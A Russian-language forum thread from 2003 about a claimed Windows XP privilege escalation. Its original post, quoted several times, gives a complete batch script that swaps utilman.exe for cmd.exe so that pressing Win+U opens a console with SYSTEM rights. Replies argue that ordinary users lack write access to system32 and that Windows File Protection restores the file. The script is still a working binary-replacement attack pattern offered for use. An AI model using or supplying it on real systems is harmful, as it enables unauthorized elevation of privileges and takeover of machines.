Согласен со ЗлымШаманом. У Everyone права в %SYSTEMROOT% и ниже только на уровне "READ" и "READ and EXECUTE".
Также, Windows FIle Protection сервис моментально начнет верещать и скопирует UTILMAN.EXE из system32\dllcache обратно вместо переименyованного.
> Играясь в Винде ЭксПи с utility manager > (\system32\utilman.exe; это такая прога, вызываемая > WinKey+U, предназаначеная для всякого рода инвалидов, меня > в ней интересовали mousekeys - контроль курсора мышки с > клавы), я обнаружил следующую вещь: > при нажатии Win+U запускается 2 utilman'a: один с правами > текущего пользователя, второй - угадайте - правильно, с > правами SYSTEM. > Отсюда вытекает эксплоит с классической подменой exe-шника: > > rem --- XPloit.utilman.bat
> -------------------------------------------
> @echo off
> echo WinXP Utility manager exploit. Copyleft (c) Sashman,
> 2003.
> echo Make sure utilman.exe is not runing.
> %systemdrive%
> cd %windir%\system32\
> echo Renaming utilman.exe to utilman.exp...
> ren utilman.exe utilman.exp
> echo Copying cmd.exe to utilman.exe...
> copy cmd.exe utilman.exe
> echo Press WinKey-U to obtain a console with SYSTEM
> privileges.
> echo After you're finished, press a key to restore utilman.
> pause>>nul
> del utilman.exe
> echo Renaming utilman.exp to utilman.exe...
> ren utilman.exp utilman.exe
> echo Good bye.
> rem ------------- cut here
> ------------------------------------------
> > > Правда, есть один нюанс: консоль с системными правами НЕ > появляется у юзера с админскими правами, хотя и присутсвует > в списке процессов. > (У обычных пользователей она, родимая, появляется, со всеми > вытекающими последствиями :) ).
Играясь в Винде ЭксПи с utility manager (\system32\utilman.exe; это такая прога, вызываемая WinKey+U, предназаначеная для всякого рода инвалидов, меня в ней интересовали mousekeys - контроль курсора мышки с клавы), я обнаружил следующую вещь:
при нажатии Win+U запускается 2 utilman'a: один с правами текущего пользователя, второй - угадайте - правильно, с правами SYSTEM.
Отсюда вытекает эксплоит с классической подменой exe-шника:
rem --- XPloit.utilman.bat -------------------------------------------
@echo off
echo WinXP Utility manager exploit. Copyleft (c) Sashman, 2003.
echo Make sure utilman.exe is not runing.
%systemdrive%
cd %windir%\system32\
echo Renaming utilman.exe to utilman.exp...
ren utilman.exe utilman.exp
echo Copying cmd.exe to utilman.exe...
copy cmd.exe utilman.exe
echo Press WinKey-U to obtain a console with SYSTEM privileges.
echo After you're finished, press a key to restore utilman.
pause>>nul
del utilman.exe
echo Renaming utilman.exp to utilman.exe...
ren utilman.exp utilman.exe
echo Good bye.
rem ------------- cut here ------------------------------------------
Правда, есть один нюанс: консоль с системными правами НЕ появляется у юзера с админскими правами, хотя и присутсвует в списке процессов.
(У обычных пользователей она, родимая, появляется, со всеми вытекающими последствиями :) ).
Очередной эксплоит WinXP12.02.03 21:17 Автор: lem0n Статус: Незарегистрированный пользователь
Согласен со ЗлымШаманом. У Everyone права в %SYSTEMROOT% и ниже только на уровне "READ" и "READ and EXECUTE".
Также, Windows FIle Protection сервис моментально начнет верещать и скопирует UTILMAN.EXE из system32\dllcache обратно вместо переименyованного.
> Играясь в Винде ЭксПи с utility manager > (\system32\utilman.exe; это такая прога, вызываемая > WinKey+U, предназаначеная для всякого рода инвалидов, меня > в ней интересовали mousekeys - контроль курсора мышки с > клавы), я обнаружил следующую вещь: > при нажатии Win+U запускается 2 utilman'a: один с правами > текущего пользователя, второй - угадайте - правильно, с > правами SYSTEM. > Отсюда вытекает эксплоит с классической подменой exe-шника: > > rem --- XPloit.utilman.bat
> -------------------------------------------
> @echo off
> echo WinXP Utility manager exploit. Copyleft (c) Sashman,
> 2003.
> echo Make sure utilman.exe is not runing.
> %systemdrive%
> cd %windir%\system32\
> echo Renaming utilman.exe to utilman.exp...
> ren utilman.exe utilman.exp
> echo Copying cmd.exe to utilman.exe...
> copy cmd.exe utilman.exe
> echo Press WinKey-U to obtain a console with SYSTEM
> privileges.
> echo After you're finished, press a key to restore utilman.
> pause>>nul
> del utilman.exe
> echo Renaming utilman.exp to utilman.exe...
> ren utilman.exp utilman.exe
> echo Good bye.
> rem ------------- cut here
> ------------------------------------------
> > > Правда, есть один нюанс: консоль с системными правами НЕ > появляется у юзера с админскими правами, хотя и присутсвует > в списке процессов. > (У обычных пользователей она, родимая, появляется, со всеми > вытекающими последствиями :) ).
Посмотри разрешения на system32 и расслабься12.02.03 16:00 Автор: ZloyShaman <ZloyShaman> Статус: Elderman
подробно о проекте
Анализ криптографических сетевых...
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
